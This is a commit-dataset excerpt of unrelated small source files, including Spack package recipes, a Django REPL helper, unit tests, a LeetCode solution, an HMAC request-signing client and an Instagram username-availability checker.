# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Autogen(AutotoolsPackage):
    """AutoGen is a tool designed to simplify the creation and maintenance of
    programs that contain large amounts of repetitious text. It is especially
    valuable in programs that have several blocks of text that must be kept
    synchronized."""

    homepage = "https://www.gnu.org/software/autogen/index.html"
    url = "https://ftp.gnu.org/gnu/autogen/rel5.18.12/autogen-5.18.12.tar.gz"
    list_url = "https://ftp.gnu.org/gnu/autogen"
    list_depth = 2

    version('5.18.12', '551d15ccbf5b5fc5658da375d5003389')

    variant('xml', default=True, description='Enable XML support')

    depends_on('pkg-config@0.9.0:', type='build')
    depends_on('guile@1.8:2.0')
    depends_on('libxml2', when='+xml')

    def configure_args(self):
        """Assemble ./configure flags from the spec's variants."""
        spec = self.spec
        if '+xml' in spec:
            xml_arg = '--with-libxml2={0}'.format(spec['libxml2'].prefix)
        else:
            xml_arg = '--without-libxml2'
        # `make check` fails unless NLS is disabled; adding a gettext
        # dependency does not help.
        return ['--disable-nls', xml_arg]
| lgpl-2.1 | Python |
|
cbbf9f34d08897358023078d81be3fa798601b02 | add the repl.py | mitodl/bootcamp-ecommerce,mitodl/bootcamp-ecommerce,mitodl/bootcamp-ecommerce,mitodl/bootcamp-ecommerce | repl.py | repl.py | #!/usr/bin/env python3
"""Run Django shell with imported modules"""
if __name__ == "__main__":
import os
if not os.environ.get("PYTHONSTARTUP"):
from subprocess import check_call
import sys
base_dir = os.path.dirname(os.path.abspath(__file__))
sys.exit(
check_call(
[os.path.join(base_dir, "manage.py"), "shell", *sys.argv[1:]],
env={**os.environ, "PYTHONSTARTUP": os.path.join(base_dir, "repl.py")},
)
)
# put imports here used by PYTHONSTARTUP
from django.conf import settings
for app in settings.INSTALLED_APPS:
try:
exec( # pylint: disable=exec-used
"from {app}.models import *".format(app=app)
)
except ModuleNotFoundError:
pass
| bsd-3-clause | Python |
|
21799cbe81c57f80f66cb5a90992d6ff66c31e2d | Create new package. (#5919) | LLNL/spack,tmerrick1/spack,tmerrick1/spack,tmerrick1/spack,lgarren/spack,lgarren/spack,lgarren/spack,iulian787/spack,LLNL/spack,iulian787/spack,iulian787/spack,matthiasdiener/spack,skosukhin/spack,krafczyk/spack,LLNL/spack,mfherbst/spack,lgarren/spack,matthiasdiener/spack,mfherbst/spack,iulian787/spack,LLNL/spack,skosukhin/spack,tmerrick1/spack,mfherbst/spack,EmreAtes/spack,skosukhin/spack,EmreAtes/spack,matthiasdiener/spack,mfherbst/spack,matthiasdiener/spack,tmerrick1/spack,EmreAtes/spack,krafczyk/spack,mfherbst/spack,matthiasdiener/spack,krafczyk/spack,skosukhin/spack,EmreAtes/spack,EmreAtes/spack,skosukhin/spack,LLNL/spack,iulian787/spack,krafczyk/spack,lgarren/spack,krafczyk/spack | var/spack/repos/builtin/packages/r-hmisc/package.py | var/spack/repos/builtin/packages/r-hmisc/package.py | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RHmisc(RPackage):
    """Contains many functions useful for data analysis, high-level
    graphics, utility operations, functions for computing sample size
    and power, importing and annotating datasets, imputing missing
    values, advanced table making, variable clustering, character
    string manipulation, conversion of R objects to LaTeX and html
    code, and recoding variables."""

    homepage = "http://biostat.mc.vanderbilt.edu/Hmisc"
    url = "https://cran.rstudio.com/src/contrib/Hmisc_4.0-3.tar.gz"
    # Superseded releases move to the CRAN archive.
    list_url = "https://cran.r-project.org/src/contrib/Archive/Hmisc"

    version('4.0-3', '7091924db1e473419d8116c3335f82da')

    # R package dependencies, required both at build and run time.
    depends_on('r-lattice', type=('build', 'run'))
    depends_on('r-survival', type=('build', 'run'))
    depends_on('r-formula', type=('build', 'run'))
    depends_on('r-ggplot2', type=('build', 'run'))
    depends_on('r-latticeextra', type=('build', 'run'))
    depends_on('r-acepack', type=('build', 'run'))
    depends_on('r-gridextra', type=('build', 'run'))
    depends_on('r-data-table', type=('build', 'run'))
    depends_on('r-htmltools', type=('build', 'run'))
    depends_on('r-base64enc', type=('build', 'run'))
    depends_on('r-htmltable', type=('build', 'run'))
    depends_on('r-viridis', type=('build', 'run'))
| lgpl-2.1 | Python |
|
cf7c33e3b3d733f24376badac70392ecb5f5a323 | add more tests | objectified/vdist,objectified/vdist | tests/test_build_definitions.py | tests/test_build_definitions.py | from vdist.builder import Build
from vdist.source import git, directory, git_directory
def test_build_projectroot_from_uri():
    # git source: project root is the repository name taken from the URI.
    build = Build(
        name='my build',
        app='myapp',
        version='1.0',
        source=git(
            uri='https://github.com/objectified/vdist',
            branch='release-1.0'
        ),
        profile='ubuntu-trusty'
    )
    assert build.get_project_root_from_source() == 'vdist'


def test_build_projectroot_from_directory():
    # directory source: project root is the basename of the path.
    build = Build(
        name='my build',
        app='myapp',
        version='1.0',
        source=directory(path='/var/tmp/vdist'),
        profile='ubuntu-trusty'
    )
    assert build.get_project_root_from_source() == 'vdist'


def test_build_projectroot_from_git_directory():
    # git_directory source: basename of the local checkout path.
    build = Build(
        name='my build',
        app='myapp',
        version='1.0',
        source=git_directory(
            path='/var/tmp/vdist',
            branch='release-1.0'
        ),
        profile='ubuntu-trusty'
    )
    assert build.get_project_root_from_source() == 'vdist'


def test_build_get_safe_dirname():
    # Characters unsafe for a directory name are replaced with '_'.
    build = Build(
        name='my build',
        app='myapp-foo @#^&_',
        version='1.0',
        source=git_directory(
            path='/var/tmp/vdist',
            branch='release-1.0'
        ),
        profile='ubuntu-trusty'
    )
    assert build.get_safe_dirname() == 'myapp-foo______-1.0-ubuntu-trusty'
| mit | Python |
|
e19097216c090c0e3f4b68c743d6427f012ab69e | Add migration for legislator change | texastribune/txlege84,texastribune/txlege84,texastribune/txlege84,texastribune/txlege84 | txlege84/legislators/migrations/0004_auto_20141201_1604.py | txlege84/legislators/migrations/0004_auto_20141201_1604.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Auto-generated: make Legislator.party an optional (nullable/blank)
    # foreign key with a 'legislators' reverse accessor.

    dependencies = [
        ('legislators', '0003_auto_20141120_1731'),
    ]

    operations = [
        migrations.AlterField(
            model_name='legislator',
            name='party',
            field=models.ForeignKey(related_name='legislators', blank=True, to='legislators.Party', null=True),
            preserve_default=True,
        ),
    ]
| mit | Python |
|
01327c49590641c8fe918d91a7877aa67fd56e88 | Add lc0172_factorial_trailing_zeroes.py | bowen0701/algorithms_data_structures | lc0172_factorial_trailing_zeroes.py | lc0172_factorial_trailing_zeroes.py | """Leetcode 172. Factorial Trailing Zeroes
Easy
URL: https://leetcode.com/problems/factorial-trailing-zeroes/
Given an integer n, return the number of trailing zeroes in n!.
Example 1:
Input: 3
Output: 0
Explanation: 3! = 6, no trailing zero.
Example 2:
Input: 5
Output: 1
Explanation: 5! = 120, one trailing zero.
Note: Your solution should be in logarithmic time complexity.
"""
class Solution(object):
    def trailingZeroes(self, n):
        """Return the number of trailing zeroes in n!.

        A trailing zero needs a factor 10 = 2 * 5; factors of 2 are always
        plentiful, so only powers of 5 must be counted: n//5 multiples of 5,
        n//25 contribute an extra five, and so on.  Runs in O(log n),
        satisfying the problem's complexity note.

        :type n: int
        :rtype: int
        """
        zeroes = 0
        while n:
            n //= 5
            zeroes += n
        return zeroes
def main():
    # Placeholder driver -- no demo implemented yet.
    pass


if __name__ == '__main__':
    main()
| bsd-2-clause | Python |
|
6a9b224834d1a523b03ce1e7c6ff4fa3ccea2583 | Add tests for parse_utils.extract_tables. | MattOates/pgcli,lk1ngaa7/pgcli,suzukaze/pgcli,TamasNo1/pgcli,darikg/pgcli,nosun/pgcli,thedrow/pgcli,johshoff/pgcli,thedrow/pgcli,j-bennet/pgcli,nosun/pgcli,koljonen/pgcli,janusnic/pgcli,bitmonk/pgcli,w4ngyi/pgcli,bitemyapp/pgcli,yx91490/pgcli,TamasNo1/pgcli,zhiyuanshi/pgcli,koljonen/pgcli,j-bennet/pgcli,zhiyuanshi/pgcli,yx91490/pgcli,n-someya/pgcli,joewalnes/pgcli,stuartquin/pgcli,w4ngyi/pgcli,bitemyapp/pgcli,d33tah/pgcli,dbcli/pgcli,MattOates/pgcli,joewalnes/pgcli,janusnic/pgcli,n-someya/pgcli,suzukaze/pgcli,bitmonk/pgcli,dbcli/vcli,d33tah/pgcli,johshoff/pgcli,dbcli/pgcli,darikg/pgcli,dbcli/vcli,lk1ngaa7/pgcli | tests/test_parse_utils.py | tests/test_parse_utils.py | from pgcli.packages.parseutils import extract_tables
def test_simple_select_single_table():
tables = extract_tables('select * from abc')
assert tables == ['abc']
def test_simple_select_multiple_tables():
tables = extract_tables('select * from abc, def')
assert tables == ['abc', 'def']
def test_simple_select_with_cols_single_table():
tables = extract_tables('select a,b from abc')
assert tables == ['abc']
def test_simple_select_with_cols_multiple_tables():
tables = extract_tables('select a,b from abc, def')
assert tables == ['abc', 'def']
#def test_select_with_hanging_comma_single_table():
#tables = extract_tables('select a, from abc')
#assert tables == ['abc']
#def test_select_with_hanging_comma_multiple_tables():
#tables = extract_tables('select a, from abc, def')
#assert tables == ['abc']
#def test_simple_insert_single_table():
#tables = extract_tables('insert into abc (id, name) values (1, "def")')
#assert tables == ['abc']
| bsd-3-clause | Python |
|
897843932937faa841220cde90bdc89603d95615 | Solve hackerrank linked list problem | honux77/practice,honux77/practice,honux77/practice,honux77/practice,honux77/practice,honux77/practice,honux77/practice,honux77/practice,honux77/practice,honux77/practice,honux77/practice,honux77/practice,honux77/practice | hackerrank/linked-list/dedup.py | hackerrank/linked-list/dedup.py | # https://www.hackerrank.com/challenges/delete-duplicate-value-nodes-from-a-sorted-linked-list/problem
def RemoveDuplicates(head):
    """Drop consecutive duplicate values from a sorted linked list.

    Returns the (unchanged) head; for an empty list that is None.
    """
    node = head
    while node is not None and node.next is not None:
        if node.data == node.next.data:
            # Unlink the duplicate and re-test from the same node.
            node.next = node.next.next
        else:
            node = node.next
    return head
|
7a25a38d7b53da6aadf5b0d45aa9aefdb639ae81 | Add python sample library | hughdavenport/rails-hmac-api,hughdavenport/rails-hmac-api,hughdavenport/rails-hmac-api,hughdavenport/rails-hmac-api | test.py | test.py | from datetime import datetime
from time import mktime
from wsgiref.handlers import format_date_time
from requests.auth import AuthBase
from base64 import b64encode
from urllib import urlencode
from urlparse import urlparse, parse_qs, ParseResult
import re
import requests
import hashlib
import hmac
# Sample API key pair used by this demo client.
public_token = "Ch7/DHoFIdIDaX5m4mqGxQ=="
secret_token = "6Ql2ZXcYqOGLdwwdWbcnCJq0N32hX8NA6AWr6wewx/T+oLcWOuynddnrETxkP9cHB7jXNs09NL3vY/BGeDxxWw=="
# NOTE(review): HMACAuth is defined *below* this line, so this assignment
# raises NameError at import time -- move it after the class definition.
auth = HMACAuth(public_token, secret_token)
hostname = "localhost"
port = "3000"
https = False
base_endpoint = "api"
# e.g. "http://localhost:3000/api"; the port segment is omitted when empty.
api_base = "http%s://%s%s/%s" % ("s" if https else "", hostname, ":" + port if port else "", base_endpoint)
class HMACAuth(AuthBase):
    """requests auth hook that signs each request with an HMAC-SHA1 header.

    The signature covers content type, content MD5, path+query and date,
    comma-joined (the HTTP method is currently excluded -- see the
    commented line in canonical_string).  NOTE(review): the server must
    build an identical canonical string; verify field order against the
    API implementation.
    """

    def __init__(self, public_token, secret_token):
        self.public_token = public_token
        self.secret_token = secret_token

    def __call__(self, r):
        # requests calls this with the prepared request; mutate in place.
        self.add_auth_header(r)
        return r

    def add_auth_header(self, r):
        r.headers['Authorization'] = self.auth_header(r)

    def auth_header(self, r):
        # "APIAuth <public token>:<base64 HMAC>" scheme.
        return "APIAuth %s:%s" % (self.public_token, self.hmac_signature(r))

    def hmac_signature(self, r):
        # HMAC-SHA1 over the canonical string, keyed by the secret token.
        return b64encode(hmac.new(self.secret_token, self.canonical_string(r), hashlib.sha1).digest())

    def canonical_string(self, r):
        return ",".join([
            # self.method(r),
            self.content_type(r),
            self.content_md5(r),
            self.uri(r),
            self.date(r)
        ])

    def find_header(self, r, l):
        # First value whose header name (upper-cased) matches any candidate
        # in `l`; "" when none match.  Python-2 API (dict.iteritems).
        for header in l:
            for key, value in r.headers.iteritems():
                if key.upper() == header:
                    return value
        return ""

    def method(self, r):
        return r.method.upper()

    def content_type(self, r):
        return self.find_header(r, "CONTENT-TYPE CONTENT_TYPE HTTP_CONTENT_TYPE".split())

    def content_md5(self, r):
        # For bodied requests, compute and attach the MD5 when absent so
        # both sides sign the same value.
        md5 = self.find_header(r, "CONTENT-MD5 CONTENT_MD5".split())
        if not md5 and self.method(r) in "POST PUT".split():
            md5 = self.add_content_md5_header(r)
        return md5

    def uri(self, r):
        # Strip scheme and host; only the path (plus query) is signed.
        url = re.sub(r'https?://[^,?/]*', '', r.url)
        return url if url else "/"

    def date(self, r):
        date = self.find_header(r, "DATE HTTP_DATE".split())
        if not date:
            date = self.add_date_header(r)
        return date

    def add_content_md5_header(self, r):
        # Hex (not base64) MD5 of the body; an absent body hashes as "".
        m = hashlib.md5()
        m.update(r.body if r.body else "")
        md5 = m.hexdigest()
        r.headers['Content-MD5'] = md5
        return md5

    def add_date_header(self, r):
        # HTTP-date for the current local time.
        date = format_date_time(mktime(datetime.now().timetuple()))
        r.headers['Date'] = date
        return date
def last_nonce():
    """Ask the API for the most recent nonce used by this key pair."""
    return int(requests.get("%s/last_nonce" % (api_base), auth=auth).text)


def add_nonce(url):
    """Return ``url`` with a fresh ``nonce`` query parameter (last + 1),
    replacing any nonce already present in the query string."""
    nonce = last_nonce() + 1
    uri = urlparse(url)
    query = parse_qs(uri.query)
    if 'nonce' in query:
        del query['nonce']
    query['nonce'] = nonce
    # doseq=True expands the list values produced by parse_qs.
    query = urlencode(query, True)
    return ParseResult(uri.scheme, uri.netloc, uri.path, uri.params, query, uri.fragment).geturl()


# Smoke test: hit the authenticated /test endpoint.
# NOTE(review): Python-2 print statement below; use print() for Python 3.
url = "%s/test" % (api_base)
r = requests.get(add_nonce(url), auth=auth)
print r.text
| mit | Python |
|
b3a20379162a068cc8f9a0f314a21a46ec40e4c6 | Add simple unit test for snapshot iteration class | micxer/fix-time-machine-freenas | test.py | test.py | #!/usr/bin/env python
import unittest
from fix_time_machine_backup import SnapshotList
class TestSnapshotList(unittest.TestCase):
def setUp(self):
self.snapshot_list = SnapshotList([
'auto-20160820.2103-2m',
'auto-20160821.0003-2m',
'auto-20160821.1503-2m',
'auto-20160821.2303-2m',
'auto-20160823.1003-2m',
'auto-20160825.1003-2m',
'auto-20160827.0003-2m',
'auto-20160827.1003-2m',
'auto-20160828.0603-2m',
])
def test_get_next_snapshot(self):
self.assertEqual(self.snapshot_list.get_current_snapshot(), 'auto-20160828.0603-2m')
self.assertEqual(self.snapshot_list.get_next_snapshot(), 'auto-20160821.0003-2m')
if __name__ == '__main__':
unittest.main() | bsd-3-clause | Python |
|
aaea97c5cab778174b45cb2557d819deb769a45e | Create instagram_checker.py | AlanBaumgartner/instagram_checker | instagram_checker.py | instagram_checker.py | import requests, argparse, sys
class checker:
    """Check a list of Instagram usernames for availability.

    Logs in with the supplied account, requests each profile page, and
    appends every username whose page title reports "Page Not Found"
    (i.e. the name is unclaimed) to the output file.
    """

    def __init__(self):
        # Present a browser-like User-Agent; default UAs get blocked.
        self.headers = {'User-agent': 'Mozilla/5.0'}
        self.loginurl = 'https://www.instagram.com/accounts/login/ajax/'
        self.url = 'https://www.instagram.com/'
        # One session for the whole run so login cookies persist.
        self.s = requests.session()
        self.s.headers.update(self.headers)
        # Command-line options: credentials plus input/output files.
        parser = argparse.ArgumentParser()
        parser.add_argument("-u", dest='username', help="Instagram username",
                            action="store")
        parser.add_argument("-p", dest='password', help="Instagram password",
                            action="store")
        parser.add_argument("-i", dest='inputf', help="Textfile with usernames",
                            action="store")
        parser.add_argument("-o", dest='outputf', help="Output textfile",
                            action="store")
        args = parser.parse_args()
        self.username = args.username
        self.password = args.password
        self.inputf = args.inputf
        self.outputf = args.outputf

    def login(self, username, password):
        """Log the shared session in; exits the program on failure."""
        loginRequest = self.s.post(
            self.loginurl,
            headers={
                # CSRF token is scraped from the landing page's inline JSON.
                'x-csrftoken': self.s.get(self.url).text.split('csrf_token": "')[1].split('"')[0],
                'x-instagram-ajax': '1',
                'x-requested-with': 'XMLHttpRequest',
                'Origin': self.url,
                'Referer': self.url,
            },
            data={
                'username': username,
                'password': password,
            }
        )
        if loginRequest.json()['authenticated']:
            print('Logged In.')
        else:
            sys.exit("Login Failed, closing program.")

    def get_usernames(self, filename):
        """Return the usernames listed one per line in ``filename``.

        Blank lines (including the trailing newline artifact of split)
        are dropped so we never query an empty username.
        """
        with open(filename, "r") as f:
            return [name for name in f.read().split("\n") if name]

    def check_usernames(self, username, output):
        """Append every available name in ``username`` (an iterable of
        usernames) to the ``output`` file.

        BUG FIX: the original iterated the module-level ``usernames``
        global instead of its own parameter.
        """
        for user in username:
            r = self.s.get(self.url + user)
            page = r.text
            # Extract the <title> text; unknown accounts render
            # a "Page Not Found" title.
            title = page[page.find('<title>') + 7:page.find('</title>')]
            if "Page Not Found" in title:
                with open(output, "a") as a:
                    a.write(user + '\n')
if __name__ == "__main__":
check = checker()
check.login(check.username, check.password)
#Clears output file for new usernames
with open(check.outputf, "w") as a:
print('Output file cleared.')
usernames = check.get_usernames(check.inputf)
check.check_usernames(usernames, check.outputf)
| mit | Python |
|
16aa4a292fafa2a74f668a56c5cf1a66f923df24 | Make src.cm.tools a package | cc1-cloud/cc1,cc1-cloud/cc1,cc1-cloud/cc1,cc1-cloud/cc1 | src/cm/tools/__init__.py | src/cm/tools/__init__.py | """@package cm.tools
@date Jun 6, 2014
@author Zosia Sobocińska
"""
| apache-2.0 | Python |
|
519d6052e3bf16c8028d39eab374cd2aa17ffd4e | add position field to user committee | dhosterman/hebrew_order_david,dhosterman/hebrew_order_david,dhosterman/hebrew_order_david | application/migrations/0014_usercommittee_position.py | application/migrations/0014_usercommittee_position.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Auto-generated: add a required `position` char field to UserCommittee
    # (default '' supplied only to backfill existing rows).

    dependencies = [
        ('application', '0013_auto_20150313_2126'),
    ]

    operations = [
        migrations.AddField(
            model_name='usercommittee',
            name='position',
            field=models.CharField(max_length=255, default=''),
            preserve_default=False,
        ),
    ]
| mit | Python |
|
557b0f30e0180a526433b65915d2a137144f2f05 | add test_logger.py | alphatwirl/alphatwirl,alphatwirl/alphatwirl,alphatwirl/alphatwirl,alphatwirl/alphatwirl | tests/unit/test_logger.py | tests/unit/test_logger.py | # Tai Sakuma <tai.sakuma@gmail.com>
import logging
import alphatwirl
##__________________________________________________________________||
def test_logger_exist():
    # Importing alphatwirl should register its package-level logger.
    assert 'alphatwirl' in logging.Logger.manager.loggerDict

def test_len_handlers():
    # The package attaches at least one handler to its logger.
    logger = logging.getLogger('alphatwirl')
    assert len(logger.handlers) >= 1

##__________________________________________________________________||
def test_example():
    # Executable documentation: snapshot the effective level of every
    # registered logger (no assertions on purpose).
    logger_names = logging.Logger.manager.loggerDict.keys()
    loglevel_dict = {l: logging.getLogger(l).getEffectiveLevel() for l in logger_names}
    # a dict of names and levels of loggers
    # e.g.,
    # {
    #     'alphatwirl': 40,
    #     'alphatwirl.delphes': 40,
    #     'alphatwirl.loop': 40,
    #     'pandas': 0,
    # }
    #
    # https://docs.python.org/3/library/logging.html#logging-levels
    # Level      Numeric value
    # CRITICAL   50
    # ERROR      40
    # WARNING    30
    # INFO       20
    # DEBUG      10
    # NOTSET     0

##__________________________________________________________________||
| bsd-3-clause | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.